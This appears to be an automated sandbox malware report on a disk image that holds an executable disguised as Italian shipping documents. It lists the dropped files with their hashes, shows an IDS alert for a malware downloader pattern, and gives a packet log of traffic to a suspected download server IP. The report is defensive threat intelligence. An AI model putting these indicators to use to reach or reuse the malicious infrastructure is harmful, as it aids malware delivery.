|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 748488 |
Entropy (8bit): | 7.618269683518012 |
Encrypted: | false |
SSDEEP: | 12288:nfLdembnSidSCwsYk8KSO4nMUBOGmJ9R01jS+VBtyS9TvkXFDsiJjWlWVB0mPH:nfLNnSsms/8K54nsVJ9F+VHtkXF4i7XH |
MD5: | 6C446FD0A3F6D498F5CBD0725CE7F232 |
SHA1: | D814C5F4BC9A61690318BA2ED8EC22D55AF16CCE |
SHA-256: | 8A149E1DED1CCE5485B9783687DD8F94C2F3926EDD17E62A682FE56CC73B1AE4 |
SHA-512: | 7A2F40DE4785734831AB45945D2A7C0D610D597DB90AAC644FACA8C0A4F4D35A4D7D0B2C9397C41F8FC993B91D5EE4BDD5D1E870488CE49F11F34ECB3939B746 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 70325 |
Entropy (8bit): | 5.158902637069244 |
Encrypted: | false |
SSDEEP: | 1536:7Y7brIQR5wdxbwMj3Li8faaKW0UW9AeKnXhSh04R/ID1d2Xnaah6:8HMQkbwMDlipG/BxfUIhl |
MD5: | 28CAA5C31A5E71EAE249CDDEB36BDC2E |
SHA1: | 0FA31BF12563C08257F3DEF568BBE50F12667418 |
SHA-256: | 1248FC3D0506610988E6606216DB30BB9018A411DB91FEBA6F4E2860E98BC967 |
SHA-512: | E866F480B2ECD12324D9B5237B0B0EBFEA13582A8AEB6B1D143BD015C1F5971E4BDF350DBA46EE805696BB0A38422370BB6147F341AF1F8359ECF1BF047B0588 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 245776 |
Entropy (8bit): | 1.2423947315855175 |
Encrypted: | false |
SSDEEP: | 768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H |
MD5: | 9F9EC5CB34B99692A4EAC963634A7D82 |
SHA1: | 5C1C97F3B00365F6CDB43112D31D7DD3AA050870 |
SHA-256: | 7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F |
SHA-512: | A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 452228 |
Entropy (8bit): | 1.250842541049128 |
Encrypted: | false |
SSDEEP: | 768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8 |
MD5: | 30C2C02FB78EFAA65C6A38457A7DC4F6 |
SHA1: | 40AEF6B9982695F88F0515104BFEEACFAF22FEDA |
SHA-256: | CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC |
SHA-512: | 8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344050 |
Entropy (8bit): | 7.580146229974094 |
Encrypted: | false |
SSDEEP: | 6144:9ruXsLmgXj+a9etxVoOztIvtqYNsTOwJOBQ7Uv:9aumgXetHoStettqTOwaQYv |
MD5: | 39486BA352B5221ADE774BCECDE6F4DB |
SHA1: | 1E37B8B97559B16397301136B7B4ABFF7C50E86C |
SHA-256: | 9B9BFB77B758FA9BE7BDDB087F9E0893755B7455BC5AF6DA4E929E0EE3270D8D |
SHA-512: | 1DBA6E25006FA096DD90C7A64097D5F3CFBA857E14D4C32FBC9F4CA04E8E33D744B2C7048B569446024E9CF78577D4240C004BCF7ADE91839D7FAAE1CE864495 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328009 |
Entropy (8bit): | 1.2551228776153396 |
Encrypted: | false |
SSDEEP: | 1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU |
MD5: | 78C7002A6C29415CEA767894F99BDF01 |
SHA1: | 37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8 |
SHA-256: | 414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E |
SHA-512: | A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58 |
Malicious: | false |
Preview: |
Process: | \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 453 |
Entropy (8bit): | 4.241518252490206 |
Encrypted: | false |
SSDEEP: | 6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2 |
MD5: | 261F38F05E7DE27DA302C07B62E1F94D |
SHA1: | 8D495D43FC7A2B40C52B8D31678F24B519257610 |
SHA-256: | 50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328 |
SHA-512: | 62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 302 |
Entropy (8bit): | 4.4126027758802335 |
Encrypted: | false |
SSDEEP: | 6:wvMYFVEh1IM6VZ1ErQNwvm/cHg2a9yotVU06X//F:wvMYFVEh156Vwnusg2a9ySVU06XV |
MD5: | 17C99C485FA2A13E5AA1ED2E49D1421E |
SHA1: | 90541F934AFFE8917E470CD02ADD5B6CDE503A2C |
SHA-256: | 208DE1CBAD2444DEF5DDE1A55320E22E7C88EFC1C9D4F9503980BE31029B13CD |
SHA-512: | E9E411299D06DD3DD6FC66746646292426F383ABBC640D8C8EA70E3D2CAA81B47C7DF90AA6EA224B699D58429494FF654B20101D18B3CB414AB0F95AFC59D566 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 748488 |
Entropy (8bit): | 7.618269683518012 |
Encrypted: | false |
SSDEEP: | 12288:nfLdembnSidSCwsYk8KSO4nMUBOGmJ9R01jS+VBtyS9TvkXFDsiJjWlWVB0mPH:nfLNnSsms/8K54nsVJ9F+VHtkXF4i7XH |
MD5: | 6C446FD0A3F6D498F5CBD0725CE7F232 |
SHA1: | D814C5F4BC9A61690318BA2ED8EC22D55AF16CCE |
SHA-256: | 8A149E1DED1CCE5485B9783687DD8F94C2F3926EDD17E62A682FE56CC73B1AE4 |
SHA-512: | 7A2F40DE4785734831AB45945D2A7C0D610D597DB90AAC644FACA8C0A4F4D35A4D7D0B2C9397C41F8FC993B91D5EE4BDD5D1E870488CE49F11F34ECB3939B746 |
Malicious: | true |
Antivirus: |
|
Preview: |
File type: | |
Entropy (8bit): | 5.097156613356278 |
TrID: |
|
File name: | Ze1Ueabtx5.img |
File size: | 1'310'720 bytes |
MD5: | de10bad1ae168cd0c81afb61723464ac |
SHA1: | a5e93224048e0681278eab54ff273068bbb56289 |
SHA256: | 2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096 |
SHA512: | 50b3e0c08e774021f40e4faebf66a48c944ace698043306a39315962a7b7105416e94a293c8ca23beea19fa811e059cea7b811a39f937215ffe130017cf7b7ee |
SSDEEP: | 24576:ifLNnSsms/8K54nsVJ9F+VHtkXF4i7XPP:QkE4YJ9FQkfTPP |
TLSH: | C65522087FA8E5F1D1D5AB7D09B2839316F0B587165A5F03B214FF1E1D6D2828A0AFB4 |
File Content Preview: | ............................................................................................................................................................................................................................................................... |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-25T12:35:49.297316+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49737 | 185.29.11.53 | 80 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 25, 2024 12:35:48.688862085 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:48.694401979 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:48.694494009 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:48.694613934 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:48.699476957 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.297199011 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.297240019 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.297278881 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.297312975 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.297316074 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.297343969 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.297368050 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.297379971 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.297394037 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.297415972 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.297425985 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.297455072 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.374283075 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.374325037 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.374363899 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.374401093 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.374408007 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.374418020 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.374464035 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.374464035 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.374499083 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.374510050 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.374532938 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.374545097 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.374568939 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.374578953 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.374614000 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.385452032 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.385487080 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.385524035 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.385524035 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.385544062 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.385564089 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.451088905 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.451131105 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.451164007 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.451167107 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.451179981 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.451200962 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.451209068 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.451237917 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.451246023 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.451280117 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.451441050 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.451473951 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.451489925 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.451513052 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.451518059 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.451554060 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.462764978 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.462820053 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.462836027 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.462855101 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.462869883 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.462888956 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.462897062 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.462935925 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.462940931 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.462989092 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.463135004 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.463177919 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.463186979 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.463223934 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.463232040 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.463264942 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.463275909 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.463310957 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.463318110 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.463361025 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.464023113 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.464059114 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.464077950 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.464093924 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.464104891 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.464149952 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.528541088 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.528567076 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.528583050 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.528600931 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.528685093 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.528722048 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.528739929 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.528758049 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.528768063 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.528805017 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.528821945 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.539531946 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.539568901 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.539604902 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.539638042 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.539638042 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.539676905 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.539727926 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.539777040 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.539916039 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.539994955 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.540072918 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.540107012 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.540138960 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.540142059 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.540174961 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.540222883 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.540303946 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.540705919 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.540740013 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.540774107 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.540798903 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.540807009 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.540843964 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.540882111 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.540956974 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.551016092 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.551048994 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.551080942 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.551131964 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.551187038 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.551218987 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.551219940 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.551274061 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.551299095 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.551306963 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.551342010 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.551378965 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.551388025 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.551441908 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.551506042 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.552308083 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.552340984 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.552376986 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.552390099 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.552412987 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.552447081 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.552486897 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.552572012 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.553097010 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.553129911 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.553164005 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.553196907 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.553204060 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.553282022 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.605560064 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.605581999 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.605611086 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.605627060 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.605643034 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.605658054 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.605675936 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.605695009 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.605794907 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.606241941 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.606256008 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.606328964 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.616900921 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.616925001 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.616940975 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.616956949 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.617023945 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.617134094 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.617162943 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.617180109 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.617183924 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.617194891 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.617209911 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.617225885 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.617238998 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.617363930 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.617980003 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.618011951 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.618031025 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.618046999 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.618062973 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.618089914 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.618174076 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.627995014 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628011942 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628057957 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.628082991 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.628160954 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628175974 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628191948 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628206015 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628209114 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.628222942 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628237009 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.628237009 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.628237963 CEST | 80 | 49737 | 185.29.11.53 | 192.168.2.4 |
Sep 25, 2024 12:35:49.628247976 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.628269911 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
Sep 25, 2024 12:35:49.628288984 CEST | 49737 | 80 | 192.168.2.4 | 185.29.11.53 |
